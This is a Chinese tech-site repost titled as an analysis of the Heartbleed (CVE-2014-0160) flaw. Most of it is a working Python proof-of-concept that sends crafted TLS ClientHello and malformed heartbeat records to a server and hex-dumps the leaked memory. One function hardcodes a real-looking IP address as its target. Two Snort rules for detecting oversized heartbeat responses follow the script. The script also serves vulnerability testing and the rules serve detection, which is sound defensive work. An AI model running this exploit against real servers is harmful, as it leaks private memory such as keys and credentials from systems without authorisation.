MyException - 我的异常网
当前位置:我的异常网» 互联网 » 【破绽分析】Heartbleed 2014-0160漏洞Poc及规则分析

【破绽分析】Heartbleed 2014-0160漏洞Poc及规则分析

www.MyException.Cn  网友分享于:2015-08-26  浏览:0次
【漏洞分析】Heartbleed 2014-0160漏洞Poc及规则分析

HeartBleed Poc脚本
1、发送client hello接收serverhello 之后发送心跳再解析获取的数据信息
2、发送client hello时直接带上心跳消息,然后解析服务器返回信息

#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols
# The authors disclaim copyright to this source code.


import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

class par:
    port = 443
    starttls = "hi"


options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', type='string', default='', help='STARTTLS protocol: smtp, pop3, imap, ftp, or xmpp')


def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')


hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hello2 = h2bin('''
16 03 02 00 6c 01 00 00 
68 03 01 55 80 a3 2d 12 
d8 d2 07 ab 90 86 b4 3d 
b6 f2 bd 7b 87 ea e9 cb 
db ad c3 84 b0 fa 67 0f 
3c de 59 09 a6 44 b7 5c 
de 58 1f 67 26 00 38 00 
10 00 0c 00 09 00 07 00 
14 00 05 00 0e 00 08 00 
04 00 0d 00 00 00 15 00 
01 00 03 00 0b 00 11 00 
12 00 18 00 1a 00 06 00 
0a 00 13 00 17 00 16 00 
0f 00 02 00 1b 00 19 01 
00 18 03 02 00 6f 01 44 
21 09 8d 7c 6f b8 a2 26 
e3 c7 30 27 aa a5 a4 c2 
fe 59 16 48 a7 15 3d a2 
f8 8a 4c a5 6c a4 ae 42 
4a 34 26 da e1 7d cd 30 
c0 d5 a7 89 f4 d0 de 01 
1e 79 23 02 09 67 f2 5d 
7c ba ad a8 c4 5b 7a 90 
7f bb 0c 09 10 1d 3f 28 
63 77 98 cf 0c a1 be 04 
00 2e fe fc af 57 6e e9 
c8 fa c8 03 22 b4 44 e9 
20 da d1 bb b2 3d f8 fa 
42 9a a5 8b 81

''')
#04 21 is len
#0800 can triger the vulnerability max value4000
hb = h2bin('''
18 03 02 00 03
01 08 00
''')



def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print


def recvall(s, length, timeout=4):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata




def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay


def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False


        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print str(len(pay)) + "\n"
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True


        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False


BUFSIZ = 1024


def main():
    opts, args = options.parse_args()

##    args[0] = "101.227.244.221"
##    opts.port = "443"
    if len(args) < 1:
        options.print_help()
        return


    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


    print 'Connecting...'


    s.connect((args[0], opts.port))


    if opts.starttls != '':
      print 'Sending STARTTLS Protocol Command...'


    if opts.starttls == 'smtp':
      s.recv(BUFSIZ)
      s.send("EHLO openssl.client.net\n")
      s.recv(BUFSIZ)
      s.send("STARTTLS\n")
      s.recv(BUFSIZ)


    if opts.starttls == 'pop3':
      s.recv(BUFSIZ)
      s.send("STLS\n")
      s.recv(BUFSIZ)


    if opts.starttls == 'imap':
      s.recv(BUFSIZ)
      s.send("STARTTLS\n")
      s.recv(BUFSIZ)


    if opts.starttls == 'ftp':
      s.recv(BUFSIZ)
      s.send("AUTH TLS\n")
      s.recv(BUFSIZ)


    if opts.starttls == 'xmpp': # TODO: This needs SASL
      s.send("<stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' to='%s' version='1.0'\n")
      s.recv(BUFSIZ)


    print 'Sending Client Hello...'


    s.send(hello)


    print 'Waiting for Server Hello...'


    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break


    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)
def main2():
    #opts, args = options.parse_args()
    opts = par()

    arg = "101.227.244.221"
##    if len(args) < 1:
##        options.print_help()
##        return

    timeout = 20
    socket.setdefaulttimeout(timeout)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


    print 'Connecting...'


    s.connect((arg, opts.port))


    if opts.starttls != '':
      print 'Sending STARTTLS Protocol Command...'


    if opts.starttls == 'smtp':
      s.recv(BUFSIZ)
      s.send("EHLO openssl.client.net\n")
      s.recv(BUFSIZ)
      s.send("STARTTLS\n")
      s.recv(BUFSIZ)


    if opts.starttls == 'pop3':
      s.recv(BUFSIZ)
      s.send("STLS\n")
      s.recv(BUFSIZ)


    if opts.starttls == 'imap':
      s.recv(BUFSIZ)
      s.send("STARTTLS\n")
      s.recv(BUFSIZ)


    if opts.starttls == 'ftp':
      s.recv(BUFSIZ)
      s.send("AUTH TLS\n")
      s.recv(BUFSIZ)


    if opts.starttls == 'xmpp': # TODO: This needs SASL
      s.send("<stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' to='%s' version='1.0'\n")
      s.recv(BUFSIZ)


    print 'Sending Client Hello... and heartbeat request...'


    s.send(hello2)

    while True:
        typ, ver, pay = recvmsg(s)

##        _DEBUG=True
##        if _DEBUG == True: 
##            import pdb 
##            pdb.set_trace() 
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

        if typ == 24:
            print 'Received heartbeat response:'
            #hexdump(pay)
            if len(pay) > 3:
                print str(len(pay)) + "\n"
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True


        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False


if __name__ == '__main__':
    main()
    main2()

snort检测规则:

alert tcp any [!80,!445] -> any [!80,!445] (msg:"SSLv3 Tls v1 Tlsv1.1 Tlsv1.2 Large Heartbeat Response"; flow:established,to_client;
         content:"|18 03|"; depth: 2; byte_test:2, >, 200, 3, big; byte_test:2, <, 16385, 3, big; threshold:type limit, track by_src, count 1
        , seconds 600; reference:cve,2014-0160; classtype:bad-unknown; sid: 1000000; rev:4;)

alert tcp any [!80,!445] -> any [!80,!445] (msg:"One pkt SSLv3 Tls v1 Tlsv1.1 Tlsv1.2 Large Heartbeat Response";flow:to_server,establ
        ished; content:"|16 03|"; offset:0; depth:2; content:"|01 00|"; offset:5;depth:2;byte_jump:2,0,relative,align;content:"|18 03|";dista
        nce:0;within:2; metadata:service https;reference:cve,2014-0160; classtype:bad-unknown; sid: 1000003; rev:4;)

版权声明:本文为博主原创文章,未经博主允许不得转载。

文章评论

程序员最害怕的5件事 你中招了吗?
程序员最害怕的5件事 你中招了吗?
每天工作4小时的程序员
每天工作4小时的程序员
看13位CEO、创始人和高管如何提高工作效率
看13位CEO、创始人和高管如何提高工作效率
写给自己也写给你 自己到底该何去何从
写给自己也写给你 自己到底该何去何从
10个调试和排错的小建议
10个调试和排错的小建议
“懒”出效率是程序员的美德
“懒”出效率是程序员的美德
2013年美国开发者薪资调查报告
2013年美国开发者薪资调查报告
程序猿的崛起——Growth Hacker
程序猿的崛起——Growth Hacker
科技史上最臭名昭著的13大罪犯
科技史上最臭名昭著的13大罪犯
编程语言是女人
编程语言是女人
什么才是优秀的用户界面设计
什么才是优秀的用户界面设计
老程序员的下场
老程序员的下场
60个开发者不容错过的免费资源库
60个开发者不容错过的免费资源库
程序员必看的十大电影
程序员必看的十大电影
中美印日四国程序员比较
中美印日四国程序员比较
Java 与 .NET 的平台发展之争
Java 与 .NET 的平台发展之争
那些争议最大的编程观点
那些争议最大的编程观点
漫画:程序员的工作
漫画:程序员的工作
Web开发人员为什么越来越懒了?
Web开发人员为什么越来越懒了?
我是如何打败拖延症的
我是如何打败拖延症的
“肮脏的”IT工作排行榜
“肮脏的”IT工作排行榜
程序员眼里IE浏览器是什么样的
程序员眼里IE浏览器是什么样的
为什么程序员都是夜猫子
为什么程序员都是夜猫子
如何区分一个程序员是“老手“还是“新手“?
如何区分一个程序员是“老手“还是“新手“?
程序员应该关注的一些事儿
程序员应该关注的一些事儿
程序员的一天:一寸光阴一寸金
程序员的一天:一寸光阴一寸金
2013年中国软件开发者薪资调查报告
2013年中国软件开发者薪资调查报告
老美怎么看待阿里赴美上市
老美怎么看待阿里赴美上市
亲爱的项目经理,我恨你
亲爱的项目经理,我恨你
程序员和编码员之间的区别
程序员和编码员之间的区别
Java程序员必看电影
Java程序员必看电影
那些性感的让人尖叫的程序员
那些性感的让人尖叫的程序员
Google伦敦新总部 犹如星级庄园
Google伦敦新总部 犹如星级庄园
初级 vs 高级开发者 哪个性价比更高?
初级 vs 高级开发者 哪个性价比更高?
代码女神横空出世
代码女神横空出世
为啥Android手机总会越用越慢?
为啥Android手机总会越用越慢?
十大编程算法助程序员走上高手之路
十大编程算法助程序员走上高手之路
10个帮程序员减压放松的网站
10个帮程序员减压放松的网站
做程序猿的老婆应该注意的一些事情
做程序猿的老婆应该注意的一些事情
程序员周末都喜欢做什么?
程序员周末都喜欢做什么?
我的丈夫是个程序员
我的丈夫是个程序员
程序员都该阅读的书
程序员都该阅读的书
如何成为一名黑客
如何成为一名黑客
一个程序员的时间管理
一个程序员的时间管理
Web开发者需具备的8个好习惯
Web开发者需具备的8个好习惯
5款最佳正则表达式编辑调试器
5款最佳正则表达式编辑调试器
总结2014中国互联网十大段子
总结2014中国互联网十大段子
我跳槽是因为他们的显示器更大
我跳槽是因为他们的显示器更大
团队中“技术大拿”并非越多越好
团队中“技术大拿”并非越多越好
软件开发程序错误异常ExceptionCopyright © 2009-2015 MyException 版权所有